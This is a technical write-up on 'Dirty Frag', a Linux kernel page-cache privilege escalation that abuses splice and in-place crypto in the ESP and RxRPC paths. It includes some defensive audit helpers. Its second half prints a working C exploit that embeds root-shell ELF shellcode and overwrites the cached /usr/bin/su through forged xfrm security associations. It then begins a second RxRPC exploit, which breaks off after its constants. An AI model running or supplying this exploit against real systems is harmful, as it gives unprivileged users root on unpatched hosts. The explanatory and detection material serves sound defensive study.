Dirty Frag: A New Linux Page-Cache Privilege Escalation Class

Executive Summary

Dirty Frag is a newly disclosed Linux kernel local privilege escalation vulnerability class that allows an unprivileged local user to obtain root privileges on many major Linux distributions. The issue was published by Hyunwoo Kim, also known as V4bel, and is described as a descendant of the same page-cache corruption family as Dirty Pipe and Copy Fail. Unlike many kernel exploitation techniques, Dirty Frag is not based on a fragile race condition. The researcher describes it as a deterministic logic bug with a high success rate and no required timing window.

At a high level, Dirty Frag abuses the interaction between Linux zero-copy I/O, splice(), struct sk_buff fragments, and in-place cryptographic operations. A page from a file that the attacker can only read is placed into a socket buffer fragment. Later, receiver-side kernel crypto code performs an in-place write on that fragment. Because the fragment still points to the page cache of a protected file, the kernel modifies the in-memory cached copy of that file, even though the attacker never had write permission to the file itself.

The chain combines two variants: xfrm-ESP Page-Cache Write and RxRPC Page-Cache Write. The first gives a powerful controlled 4-byte write primitive but depends on the ability to create user and network namespaces. The second does not require namespace creation, but depends on the availability of the rxrpc module. Chaining them gives broad coverage across major distributions.

Affected Systems

According to the public Dirty Frag repository, the xfrm-ESP variant has existed since Linux commit cac2661c53f3, dated January 17, 2017, and was still present in upstream at the time of disclosure. The RxRPC variant has existed since commit 2dc334f1a63a, dated June 2023, and was likewise still present in upstream. The author therefore describes the effective vulnerability lifetime of the chain as roughly nine years, measured from the older ESP commit.

The exploit was tested by the researcher on several modern distributions and kernels, including:

Ubuntu 24.04.4:          6.17.0-23-generic
RHEL 10.1:               6.12.0-124.49.1.el10_1.x86_64
openSUSE Tumbleweed:     7.0.2-1-default
CentOS Stream 10:        6.12.0-224.el10.x86_64
AlmaLinux 10:            6.12.0-124.52.3.el10_1.x86_64
Fedora 44:               6.19.14-300.fc44.x86_64

These are the tested examples from the repository, not an exhaustive list. The practical exposure depends on kernel version, backported patches, loaded modules, namespace policy, AppArmor or SELinux policy, and whether rxrpc, ESP, and related networking paths are available.
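
As a rough aid for checking two of the factors above on a given host, the following sketch reads /proc/modules and /proc/sys/user/max_user_namespaces. The function names are illustrative and not taken from the repository. The result is only a partial signal: a module that is not currently loaded may still be auto-loadable or built in, and AppArmor or SELinux policy is not inspected at all.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

/* Return 1 if `name` is the first field of some line in a
 * /proc/modules-style listing, 0 otherwise. */
int module_listed(const char *listing, const char *name)
{
	size_t nlen = strlen(name);
	const char *line = listing;

	while (line && *line) {
		if (strncmp(line, name, nlen) == 0 && line[nlen] == ' ')
			return 1;
		line = strchr(line, '\n');
		if (line)
			line++;
	}
	return 0;
}

/* Read a small text file into buf (NUL-terminated, possibly truncated).
 * Returns 0 on success, -1 if the file cannot be opened. */
int read_small_file(const char *path, char *buf, size_t cap)
{
	assert(cap > 0);
	FILE *f = fopen(path, "r");
	if (!f)
		return -1;
	size_t n = fread(buf, 1, cap - 1, f);
	buf[n] = '\0';
	fclose(f);
	return 0;
}

/* Print a coarse, incomplete exposure summary for the current host. */
void report_exposure(void)
{
	static char buf[1 << 18];

	if (read_small_file("/proc/modules", buf, sizeof(buf)) == 0) {
		printf("rxrpc loaded: %s\n", module_listed(buf, "rxrpc") ? "yes" : "no");
		printf("esp4 loaded:  %s\n", module_listed(buf, "esp4") ? "yes" : "no");
	}
	if (read_small_file("/proc/sys/user/max_user_namespaces", buf, sizeof(buf)) == 0)
		printf("user.max_user_namespaces: %s", buf);
}
```

Calling report_exposure() from a small main() prints the summary. A "no" for rxrpc should not be read as "not exposed" without also checking whether the module can be loaded on demand.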

As of May 8, 2026, public reporting described Dirty Frag as newly disclosed and not yet broadly patched by distributions. The upstream ESP-side patch had been merged into the netdev tree on May 7, while the RxRPC-side fix was still described in the write-up as submitted but not yet upstream. Administrators should verify vendor advisories rather than assuming their distribution kernel is fixed.

Why Dirty Frag Is Possible

The bug class is about broken ownership assumptions.

Linux uses the page cache to keep in-memory copies of file contents. If a normal user opens /usr/bin/su or /etc/passwd read-only, they should be able to read cached pages but never modify them. The kernel must preserve that rule even when pages flow through advanced subsystems such as pipes, sockets, scatter-gather lists, and crypto APIs.
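
The rule described above is easy to observe from user space on the normal write path. The sketch below is illustrative only and the helper name is made up: it opens a file read-only and confirms that write() on that descriptor is refused with EBADF. Dirty Frag matters precisely because it reaches the cached page through a different path that never goes through this check.

```c
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>

/* Open `path` read-only and attempt a 1-byte write through the same
 * descriptor.  Returns 1 if the kernel refuses with EBADF (expected),
 * 0 if the write was not refused that way, -1 if open() failed. */
int readonly_fd_rejects_write(const char *path)
{
	int fd = open(path, O_RDONLY);
	if (fd < 0)
		return -1;

	ssize_t n = write(fd, "x", 1);
	int err = errno;
	close(fd);

	return (n == -1 && err == EBADF) ? 1 : 0;
}
```

For example, readonly_fd_rejects_write("/dev/null") is expected to return 1 on a typical Linux system, because the descriptor was not opened for writing.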

Dirty Frag breaks this boundary through the following sequence:

Read-only file page
        │
        │ splice()
        ▼
Pipe buffer references page-cache page
        │
        │ splice() to socket
        ▼
skb fragment points to the same page-cache page
        │
        │ receiver-side in-place crypto
        ▼
Kernel writes into skb frag
        │
        ▼
Page cache of protected file is modified in RAM

The core issue is not that in-place crypto exists. In-place crypto is a valid optimization when the kernel owns the destination buffer. The problem is that the destination buffer can still be a page-cache page that came from a read-only file and was planted into an skb fragment through zero-copy I/O. Once that happens, the crypto routine writes into memory it should have copied first.
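
The ownership problem can be modeled in plain user-space C without any kernel involvement. In the sketch below, all names are hypothetical and a byte-wise XOR stands in for the real cipher. A "fragment" only holds a pointer to memory owned by someone else; transforming through that pointer changes the owner's data, while copying first leaves it intact.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Toy stand-in for an in-place cipher: XOR every byte with a key. */
void toy_transform_in_place(uint8_t *buf, size_t len, uint8_t key)
{
	for (size_t i = 0; i < len; i++)
		buf[i] ^= key;
}

/* A "fragment" that merely references memory owned by someone else. */
struct toy_frag {
	uint8_t *data;
	size_t len;
};

/* Unsafe pattern: transform through the reference, so the owner's
 * memory is modified as a side effect. */
void process_shared(struct toy_frag *f, uint8_t key)
{
	toy_transform_in_place(f->data, f->len, key);
}

/* Safe pattern: copy into a private buffer first, then transform the
 * copy.  The owner's memory is never written. */
void process_private(const struct toy_frag *f, uint8_t key,
		uint8_t *priv, size_t cap)
{
	assert(cap >= f->len);
	memcpy(priv, f->data, f->len);
	toy_transform_in_place(priv, f->len, key);
}
```

In this model the "owner" plays the role of the page cache and process_private() plays the role of a copy-before-write step. The real kernel data structures are considerably more involved.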

Technical Diagram

+-------------------------+
| Unprivileged process    |
| opens file read-only    |
+-----------+-------------+
            |
            | splice(file -> pipe)
            v
+-------------------------+
| Pipe buffer             |
| references page cache   |
+-----------+-------------+
            |
            | splice(pipe -> socket)
            v
+-------------------------+
| struct sk_buff          |
| skb_shinfo(skb)->frags  |
| frag points to file page|
+-----------+-------------+
            |
            | kernel receive path
            v
+-------------------------+
| ESP / RxRPC crypto path |
| src == dst scatterlist  |
| in-place decrypt/write  |
+-----------+-------------+
            |
            v
+-------------------------+
| Page cache corrupted    |
| protected file appears  |
| modified in memory      |
+-------------------------+

Variant 1: xfrm-ESP Page-Cache Write

The first Dirty Frag variant lives in the IPsec ESP receive path. Before decrypting ESP payloads in place, the kernel should ensure that any non-linear skb data is copied into a private writable buffer. The relevant helper is skb_cow_data(), where COW means copy-on-write.

The problem is that the vulnerable esp_input() logic contains a path that skips this copy step for certain non-linear skb layouts. If the skb is not cloned and has no frag_list, the code can jump to skip_cow, even though skb_shinfo(skb)->frags may still contain externally pinned pages.
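
The decision described above can be written down as a small predicate. This is a simplified model with made-up types, not the kernel source. The "strict" variant is a hypothetical rule added only for contrast and should not be taken as the upstream patch.

```c
#include <stdbool.h>

/* Simplified view of the skb properties mentioned in the text. */
struct toy_skb {
	bool cloned;         /* skb shares its data with another skb */
	bool has_frag_list;  /* skb chains further skbs */
	unsigned nr_frags;   /* page fragments attached to the skb */
};

/* Models the behavior described above: the copy step is skipped
 * whenever the skb is not cloned and has no frag_list, regardless of
 * whether page fragments are attached. */
bool toy_skips_copy_as_described(const struct toy_skb *skb)
{
	return !skb->cloned && !skb->has_frag_list;
}

/* Hypothetical stricter rule (an assumption for illustration): skip
 * the copy only when there are no page fragments at all. */
bool toy_skips_copy_strict(const struct toy_skb *skb)
{
	return !skb->cloned && !skb->has_frag_list && skb->nr_frags == 0;
}
```

An skb with one spliced page fragment, no clone, and no frag_list is the interesting case: the first predicate skips the copy, the second does not.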

In the exploit strategy described by the author, the attacker uses splice() to place bytes from a protected file into the skb fragment. Then ESP processing invokes crypto_authenc_esn_decrypt() in a way that writes four bytes into the destination scatterlist. Since the source and destination scatterlists point to the same skb fragment, and the fragment points to a file page-cache page, the four-byte write lands inside the cached file content.

A key detail is that the written 4-byte value is attacker-controlled through the XFRM replay ESN state. The write-up explains that seq_hi is supplied through the XFRMA_REPLAY_ESN_VAL netlink attribute when the Security Association is registered. As a result, this variant gives control over both the target offset and the 4-byte value.

The original proof-of-concept uses this to corrupt the page cache of /usr/bin/su, replacing the beginning of the setuid-root executable in memory with a tiny root-shell ELF. The disk file is not permanently overwritten, but subsequent reads and executions see the modified cached page until the cache is dropped or the system is rebooted.

Variant 2: RxRPC Page-Cache Write

The second variant abuses RxRPC, specifically the RXKAD security path. In rxkad_verify_packet_1(), the kernel verifies a packet by performing an in-place pcbc(fcrypt) decrypt over the first 8 bytes of the RxRPC payload. The source and destination scatterlists are the same. If the payload is backed by an skb fragment that points to a page-cache page, the decrypt operation performs an 8-byte write directly into that page.

This variant is different from ESP because the attacker does not directly choose the final 8 bytes. The value written is the result of fcrypt_decrypt(C, K), where C is the current 8-byte ciphertext block and K is a session key controlled by the attacker through an RxRPC v1 token. The attacker can brute-force keys in user space until the decrypted output has the desired shape.

The public write-up describes targeting the first line of /etc/passwd. Instead of overwriting a full executable, the exploit changes the root entry so the password field becomes empty. On systems where PAM configuration accepts null passwords through pam_unix.so nullok, this can allow su to authenticate without a password and then start a root shell.
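
Because this route depends on PAM accepting empty passwords, administrators may want to audit for the nullok option. The helper below is a minimal sketch with an illustrative name: it inspects a single PAM configuration line and reports whether it is an active pam_unix.so entry carrying nullok as a whole option token. It does not follow include directives or evaluate control flags, so it is a first-pass filter rather than a full PAM parser.

```c
#include <string.h>

/* Return 1 if `line` is an active (non-comment) PAM entry that
 * references pam_unix.so with the exact option token "nullok",
 * 0 otherwise.  Tokens that merely contain the substring are ignored. */
int pam_line_allows_null(const char *line)
{
	while (*line == ' ' || *line == '\t')
		line++;
	if (*line == '#' || *line == '\0')
		return 0;

	const char *mod = strstr(line, "pam_unix.so");
	if (!mod)
		return 0;

	/* Scan the options that follow the module name. */
	const char *p = mod + strlen("pam_unix.so");
	while ((p = strstr(p, "nullok")) != NULL) {
		char before = p[-1];
		char after = p[6];
		if ((before == ' ' || before == '\t') &&
		    (after == '\0' || after == ' ' || after == '\t' || after == '\n'))
			return 1;
		p += 6;
	}
	return 0;
}
```

Feeding each line of the relevant files under /etc/pam.d/ through this function gives a quick list of entries to review by hand.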

This variant is especially important because it does not require creating a user namespace. The write-up notes that it relies on APIs available to unprivileged users, including add_key(), socket(AF_RXRPC), socket(AF_ALG), splice(), and recvmsg().

How the Chain Covers Different Linux Environments

Dirty Frag is not just one bug. It is a chain designed to handle different distribution hardening choices.

The ESP variant is the more powerful of the two because it gives a 4-byte write in which both the target offset and the value are attacker-controlled. However, registering XFRM Security Associations requires CAP_NET_ADMIN, so the exploit tries to obtain that capability inside a new user and network namespace. Some distributions allow this by default, while others restrict unprivileged user namespaces.

Ubuntu can block unprivileged user namespace creation through AppArmor policy, which may stop the ESP route. But Ubuntu also commonly ships or loads rxrpc.ko, making the RxRPC fallback relevant. Conversely, RHEL-like systems may not ship rxrpc.ko by default, but may still permit the ESP path if namespaces are available.

The resulting logic is:

Try ESP path:
    user namespace + net namespace
    register XFRM SA
    splice protected file page into skb frag
    in-place ESP crypto writes into page cache
    execute modified cached /usr/bin/su

If ESP path fails:
    try RxRPC path
    register attacker-controlled RxRPC key
    splice /etc/passwd page into skb frag
    in-place RxRPC crypto writes into page cache
    use modified cached passwd entry

This is why the author calls it “Universal Linux LPE”: not because every single kernel build is guaranteed exploitable in the same way, but because the two primitives cover each other’s environmental blind spots across major distributions.
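
For triage purposes, the fallback logic above can be reduced to a small decision function over host properties. This is a simplified model with hypothetical names. It deliberately ignores kernel version, backported fixes, and LSM policy, so a result other than TOY_PATH_NONE means "worth investigating", not "confirmed exploitable".

```c
enum toy_path { TOY_PATH_NONE = 0, TOY_PATH_ESP, TOY_PATH_RXRPC };

/* Host properties relevant to the chain, as described in the text. */
struct toy_host {
	int userns_allowed;   /* unprivileged user + net namespaces can be created */
	int esp_available;    /* ESP / xfrm receive path is usable */
	int rxrpc_available;  /* rxrpc module is loaded or loadable */
};

/* Return the first path the chain would find usable on this host,
 * following the order described above: ESP first, then RxRPC. */
enum toy_path toy_first_reachable_path(const struct toy_host *h)
{
	if (h->userns_allowed && h->esp_available)
		return TOY_PATH_ESP;
	if (h->rxrpc_available)
		return TOY_PATH_RXRPC;
	return TOY_PATH_NONE;
}
```

The model makes the mitigation picture explicit: restricting unprivileged namespaces alone still leaves the RxRPC path open when the module is available, and removing rxrpc alone still leaves the ESP path open when namespaces are permitted.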

Exploit code:

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sched.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <net/if.h>
#include <linux/if.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>
#include <linux/xfrm.h>

#ifndef UDP_ENCAP
#define UDP_ENCAP 100
#endif
#ifndef UDP_ENCAP_ESPINUDP
#define UDP_ENCAP_ESPINUDP 2
#endif
#ifndef SOL_UDP
#define SOL_UDP 17
#endif

#define ENC_PORT         4500
#define SEQ_VAL          200
#define REPLAY_SEQ       100
#define TARGET_PATH      "/usr/bin/su"
#define PATCH_OFFSET     0              /* overwrite whole ELF starting at file[0] */
#define PAYLOAD_LEN      192            /* bytes of shell_elf to write (48 triggers) */
#define ENTRY_OFFSET     0x78           /* shellcode entry inside the new ELF */

/*
 * 192-byte minimal x86_64 root-shell ELF.
 *   _start at 0x400078:
 *     setgid(0); setuid(0); setgroups(0, NULL);
 *     execve("/bin/sh", NULL, ["TERM=xterm", NULL]);
 *   PT_LOAD covers 0xb8 bytes (the actual content) at vaddr 0x400000 R+X.
 *
 *   Setting TERM in the new shell's env silences the
 *   "tput: No value for $TERM" / "test: : integer expected" noise
 *   /etc/bash.bashrc and friends emit when TERM is unset.
 *
 * Code (from offset 0x78):
 *   31 ff               xor edi, edi
 *   31 f6               xor esi, esi
 *   31 c0               xor eax, eax
 *   b0 6a               mov al, 0x6a              ; setgid
 *   0f 05               syscall
 *   b0 69               mov al, 0x69              ; setuid
 *   0f 05               syscall
 *   b0 74               mov al, 0x74              ; setgroups
 *   0f 05               syscall
 *   6a 00               push 0                    ; envp[1] = NULL
 *   48 8d 05 12 00 00 00 lea rax, [rip+0x12]      ; rax = "TERM=xterm"
 *   50                  push rax                  ; envp[0]
 *   48 89 e2            mov rdx, rsp              ; rdx = envp
 *   48 8d 3d 12 00 00 00 lea rdi, [rip+0x12]      ; rdi = "/bin/sh"
 *   31 f6               xor esi, esi              ; rsi = NULL (argv)
 *   6a 3b 58            push 0x3b ; pop rax       ; rax = 59 (execve)
 *   0f 05               syscall                   ; execve("/bin/sh",NULL,envp)
 *   "TERM=xterm\0"      (offset 0xa5..0xaf)
 *   "/bin/sh\0"         (offset 0xb0..0xb7)
 */
static const uint8_t shell_elf[PAYLOAD_LEN] = {
	0x7f,0x45,0x4c,0x46,0x02,0x01,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x02,0x00,0x3e,0x00,0x01,0x00,0x00,0x00,0x78,0x00,0x40,0x00,0x00,0x00,0x00,0x00,
	0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x00,0x00,0x00,0x00,0x40,0x00,0x38,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x01,0x00,0x00,0x00,0x05,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x00,0x00,
	0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xb8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
	0x00,0x10,0x00,0x00,0x00,0x00,0x00,0x00,0x31,0xff,0x31,0xf6,0x31,0xc0,0xb0,0x6a,
	0x0f,0x05,0xb0,0x69,0x0f,0x05,0xb0,0x74,0x0f,0x05,0x6a,0x00,0x48,0x8d,0x05,0x12,
	0x00,0x00,0x00,0x50,0x48,0x89,0xe2,0x48,0x8d,0x3d,0x12,0x00,0x00,0x00,0x31,0xf6,
	0x6a,0x3b,0x58,0x0f,0x05,0x54,0x45,0x52,0x4d,0x3d,0x78,0x74,0x65,0x72,0x6d,0x00,
	0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
};

extern int g_su_verbose;
int g_su_verbose = 0;
#define SLOG(fmt, ...) do { if (g_su_verbose) fprintf(stderr, "[su] " fmt "\n", ##__VA_ARGS__); } while (0)

static int write_proc(const char *path, const char *buf)
{
	int fd = open(path, O_WRONLY);
	if (fd < 0) return -1;
	int n = write(fd, buf, strlen(buf));
	close(fd);
	return n;
}

static void setup_userns_netns(void)
{
	uid_t real_uid = getuid();
	gid_t real_gid = getgid();
	if (unshare(CLONE_NEWUSER | CLONE_NEWNET) < 0) {
		SLOG("unshare: %s", strerror(errno));
		exit(1);
	}
	write_proc("/proc/self/setgroups", "deny");
	char map[64];
	snprintf(map, sizeof(map), "0 %u 1", real_uid);
	if (write_proc("/proc/self/uid_map", map) < 0) {
		SLOG("uid_map: %s", strerror(errno)); exit(1);
	}
	snprintf(map, sizeof(map), "0 %u 1", real_gid);
	if (write_proc("/proc/self/gid_map", map) < 0) {
		SLOG("gid_map: %s", strerror(errno)); exit(1);
	}
	int s = socket(AF_INET, SOCK_DGRAM, 0);
	if (s < 0) { SLOG("socket: %s", strerror(errno)); exit(1); }
	struct ifreq ifr; memset(&ifr, 0, sizeof(ifr));
	strncpy(ifr.ifr_name, "lo", IFNAMSIZ);
	if (ioctl(s, SIOCGIFFLAGS, &ifr) < 0) { SLOG("SIOCGIFFLAGS: %s", strerror(errno)); exit(1); }
	ifr.ifr_flags |= IFF_UP | IFF_RUNNING;
	if (ioctl(s, SIOCSIFFLAGS, &ifr) < 0) { SLOG("SIOCSIFFLAGS: %s", strerror(errno)); exit(1); }
	close(s);
}

static void put_attr(struct nlmsghdr *nlh, int type, const void *data, size_t len)
{
	struct rtattr *rta = (struct rtattr *)((char *)nlh + NLMSG_ALIGN(nlh->nlmsg_len));
	rta->rta_type = type;
	rta->rta_len  = RTA_LENGTH(len);
	memcpy(RTA_DATA(rta), data, len);
	nlh->nlmsg_len = NLMSG_ALIGN(nlh->nlmsg_len) + RTA_ALIGN(rta->rta_len);
}

static int add_xfrm_sa(uint32_t spi, uint32_t patch_seqhi)
{
	int sk = socket(AF_NETLINK, SOCK_RAW, NETLINK_XFRM);
	if (sk < 0) return -1;
	struct sockaddr_nl nl = { .nl_family = AF_NETLINK };
	if (bind(sk, (struct sockaddr*)&nl, sizeof(nl)) < 0) { close(sk); return -1; }

	char buf[4096] = {0};
	struct nlmsghdr *nlh = (struct nlmsghdr *)buf;
	nlh->nlmsg_type  = XFRM_MSG_NEWSA;
	nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_ACK;
	nlh->nlmsg_pid   = getpid();
	nlh->nlmsg_seq   = 1;
	nlh->nlmsg_len   = NLMSG_LENGTH(sizeof(struct xfrm_usersa_info));

	struct xfrm_usersa_info *xs = (struct xfrm_usersa_info *)NLMSG_DATA(nlh);
	xs->id.daddr.a4 = inet_addr("127.0.0.1");
	xs->id.spi      = htonl(spi);
	xs->id.proto    = IPPROTO_ESP;
	xs->saddr.a4    = inet_addr("127.0.0.1");
	xs->family      = AF_INET;
	xs->mode        = XFRM_MODE_TRANSPORT;
	xs->replay_window = 0;
	xs->reqid       = 0x1234;
	xs->flags       = XFRM_STATE_ESN;
	xs->lft.soft_byte_limit   = (uint64_t)-1;
	xs->lft.hard_byte_limit   = (uint64_t)-1;
	xs->lft.soft_packet_limit = (uint64_t)-1;
	xs->lft.hard_packet_limit = (uint64_t)-1;
	xs->sel.family  = AF_INET;
	xs->sel.prefixlen_d = 32;
	xs->sel.prefixlen_s = 32;
	xs->sel.daddr.a4 = inet_addr("127.0.0.1");
	xs->sel.saddr.a4 = inet_addr("127.0.0.1");

	{
		char alg_buf[sizeof(struct xfrm_algo_auth) + 32];
		memset(alg_buf, 0, sizeof(alg_buf));
		struct xfrm_algo_auth *aa = (struct xfrm_algo_auth *)alg_buf;
		strncpy(aa->alg_name, "hmac(sha256)", sizeof(aa->alg_name)-1);
		aa->alg_key_len   = 32 * 8;
		aa->alg_trunc_len = 128;
		memset(aa->alg_key, 0xAA, 32);
		put_attr(nlh, XFRMA_ALG_AUTH_TRUNC, alg_buf, sizeof(alg_buf));
	}
	{
		char alg_buf[sizeof(struct xfrm_algo) + 16];
		memset(alg_buf, 0, sizeof(alg_buf));
		struct xfrm_algo *ea = (struct xfrm_algo *)alg_buf;
		strncpy(ea->alg_name, "cbc(aes)", sizeof(ea->alg_name)-1);
		ea->alg_key_len = 16 * 8;
		memset(ea->alg_key, 0xBB, 16);
		put_attr(nlh, XFRMA_ALG_CRYPT, alg_buf, sizeof(alg_buf));
	}
	{
		struct xfrm_encap_tmpl enc;
		memset(&enc, 0, sizeof(enc));
		enc.encap_type  = UDP_ENCAP_ESPINUDP;
		enc.encap_sport = htons(ENC_PORT);
		enc.encap_dport = htons(ENC_PORT);
		enc.encap_oa.a4 = 0;
		put_attr(nlh, XFRMA_ENCAP, &enc, sizeof(enc));
	}
	{
		char esn_buf[sizeof(struct xfrm_replay_state_esn) + 4];
		memset(esn_buf, 0, sizeof(esn_buf));
		struct xfrm_replay_state_esn *esn = (struct xfrm_replay_state_esn *)esn_buf;
		esn->bmp_len       = 1;
		esn->oseq          = 0;
		esn->seq           = REPLAY_SEQ;
		esn->oseq_hi       = 0;
		esn->seq_hi        = patch_seqhi;
		esn->replay_window = 32;
		put_attr(nlh, XFRMA_REPLAY_ESN_VAL, esn_buf, sizeof(esn_buf));
	}

	if (send(sk, nlh, nlh->nlmsg_len, 0) < 0) { close(sk); return -1; }
	char rbuf[4096];
	int n = recv(sk, rbuf, sizeof(rbuf), 0);
	if (n < 0) { close(sk); return -1; }
	struct nlmsghdr *rh = (struct nlmsghdr *)rbuf;
	if (rh->nlmsg_type == NLMSG_ERROR) {
		struct nlmsgerr *e = NLMSG_DATA(rh);
		if (e->error) { close(sk); return -1; }
	}
	close(sk);
	return 0;
}

static int do_one_write(const char *path, off_t offset, uint32_t spi)
{
	int sk_recv = socket(AF_INET, SOCK_DGRAM, 0);
	if (sk_recv < 0) return -1;
	int one = 1;
	setsockopt(sk_recv, SOL_SOCKET, SO_REUSEADDR, &one, sizeof(one));
	struct sockaddr_in sa_d = {
		.sin_family = AF_INET,
		.sin_port   = htons(ENC_PORT),
		.sin_addr   = { inet_addr("127.0.0.1") },
	};
	if (bind(sk_recv, (struct sockaddr*)&sa_d, sizeof(sa_d)) < 0) {
		close(sk_recv); return -1;
	}
	int encap = UDP_ENCAP_ESPINUDP;
	if (setsockopt(sk_recv, IPPROTO_UDP, UDP_ENCAP, &encap, sizeof(encap)) < 0) {
		close(sk_recv); return -1;
	}
	int sk_send = socket(AF_INET, SOCK_DGRAM, 0);
	if (sk_send < 0) { close(sk_recv); return -1; }
	if (connect(sk_send, (struct sockaddr*)&sa_d, sizeof(sa_d)) < 0) {
		close(sk_send); close(sk_recv); return -1;
	}
	int file_fd = open(path, O_RDONLY);
	if (file_fd < 0) { close(sk_send); close(sk_recv); return -1; }

	int pfd[2];
	if (pipe(pfd) < 0) { close(file_fd); close(sk_send); close(sk_recv); return -1; }

	uint8_t hdr[24];
	*(uint32_t*)(hdr + 0) = htonl(spi);
	*(uint32_t*)(hdr + 4) = htonl(SEQ_VAL);
	memset(hdr + 8, 0xCC, 16);

	struct iovec iov_h = { .iov_base = hdr, .iov_len = sizeof(hdr) };
	if (vmsplice(pfd[1], &iov_h, 1, 0) != (ssize_t)sizeof(hdr)) {
		close(file_fd); close(pfd[0]); close(pfd[1]); close(sk_send); close(sk_recv); return -1;
	}
	off_t off = offset;
	ssize_t s = splice(file_fd, &off, pfd[1], NULL, 16, SPLICE_F_MOVE);
	if (s != 16) {
		close(file_fd); close(pfd[0]); close(pfd[1]); close(sk_send); close(sk_recv); return -1;
	}
	s = splice(pfd[0], NULL, sk_send, NULL, 24 + 16, SPLICE_F_MOVE);
	/* still proceed regardless of splice rc — kernel may have already
	 * decrypted the page in the time between splice and recv */
	usleep(150 * 1000);

	close(file_fd); close(pfd[0]); close(pfd[1]);
	close(sk_send); close(sk_recv);
	return s == 40 ? 0 : -1;
}

static int verify_byte(const char *path, off_t offset, uint8_t want)
{
	int fd = open(path, O_RDONLY);
	if (fd < 0) return -1;
	uint8_t got;
	if (pread(fd, &got, 1, offset) != 1) { close(fd); return -1; }
	close(fd);
	return got == want ? 0 : -1;
}

static int corrupt_su(void)
{
	setup_userns_netns();
	usleep(100 * 1000);

	/* Install one xfrm SA per 4-byte chunk (PAYLOAD_LEN / 4 = 48).  Each
	 * carries the desired payload word in its seq_hi field. */
	for (int i = 0; i < PAYLOAD_LEN / 4; i++) {
		uint32_t spi = 0xDEADBE10 + i;
		uint32_t seqhi =
			((uint32_t)shell_elf[i*4 + 0] << 24) |
			((uint32_t)shell_elf[i*4 + 1] << 16) |
			((uint32_t)shell_elf[i*4 + 2] <<  8) |
			((uint32_t)shell_elf[i*4 + 3]);
		if (add_xfrm_sa(spi, seqhi) < 0) {
			SLOG("add_xfrm_sa #%d failed", i);
			return -1;
		}
	}
	SLOG("installed %d xfrm SAs", PAYLOAD_LEN / 4);

	for (int i = 0; i < PAYLOAD_LEN / 4; i++) {
		uint32_t spi = 0xDEADBE10 + i;
		off_t off = PATCH_OFFSET + i * 4;
		if (do_one_write(TARGET_PATH, off, spi) < 0) {
			SLOG("do_one_write #%d at off=0x%lx failed", i, (long)off);
			return -1;
		}
	}
	SLOG("wrote %d bytes to %s starting at 0x%x",
			PAYLOAD_LEN, TARGET_PATH, PATCH_OFFSET);
	return 0;
}

int su_lpe_main(int argc, char **argv)
{
	for (int i = 1; i < argc; i++) {
		if (!strcmp(argv[i], "-v") || !strcmp(argv[i], "--verbose"))
			g_su_verbose = 1;
		else if (!strcmp(argv[i], "--corrupt-only"))
			; /* compat: this body always corrupts only */
	}
	if (getenv("DIRTYFRAG_VERBOSE")) g_su_verbose = 1;

	pid_t cpid = fork();
	if (cpid < 0) return 1;
	if (cpid == 0) {
		int rc = corrupt_su();
		_exit(rc == 0 ? 0 : 2);
	}
	int cstatus;
	waitpid(cpid, &cstatus, 0);
	if (!WIFEXITED(cstatus) || WEXITSTATUS(cstatus) != 0) {
		SLOG("corruption stage failed (status=0x%x)", cstatus);
		return 1;
	}

	/* Sanity check: bytes at the embedded ELF entry (file offset 0x78
	 * after our overwrite) should be 0x31 0xff (xor edi, edi — first
	 * instruction of the new shellcode). */
	if (verify_byte(TARGET_PATH, ENTRY_OFFSET, 0x31) != 0 ||
			verify_byte(TARGET_PATH, ENTRY_OFFSET + 1, 0xff) != 0) {
		SLOG("post-write verify failed (target unchanged)");
		return 1;
	}
	SLOG("/usr/bin/su page-cache patched (entry 0x%x = shellcode)",
			ENTRY_OFFSET);
	return 0;
}
/*
 * rxrpc/rxkad LPE — uid=1000 → root
 */

#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <stdarg.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <time.h>
#include <sched.h>
#include <poll.h>
#include <signal.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <sys/uio.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <linux/rxrpc.h>
#include <linux/keyctl.h>
#include <linux/if_alg.h>
#include <net/if.h>
#include <termios.h>

#ifndef AF_RXRPC
#define AF_RXRPC 33
#endif
#ifndef PF_RXRPC
#define PF_RXRPC AF_RXRPC
#endif
#ifndef SOL_RXRPC
#define SOL_RXRPC 272
#endif
#ifndef SOL_ALG
#define SOL_ALG 279
#endif
#ifndef AF_ALG
#define AF_ALG 38
#endif
#ifndef MSG_SPLICE_PAGES
#define MSG_SPLICE_PAGES 0x8000000
#endif

/* ---- rxrpc constants ---- */
#define RXRPC_PACKET_TYPE_DATA          1
#define RXRPC_PACKET_TYPE_ACK           2
#define RXRPC_PACKET_TYPE_ABORT         4
#define RXRPC_PACKET_TYPE_CHALLENGE     6
#define RXRPC_PACKET_TYPE_RESPONSE      7
#define RXRPC_CLIENT_INITIATED          0x01
#define RXRPC_REQUEST_ACK               0x02
#define RXRPC_LAST_PACKET               0x04
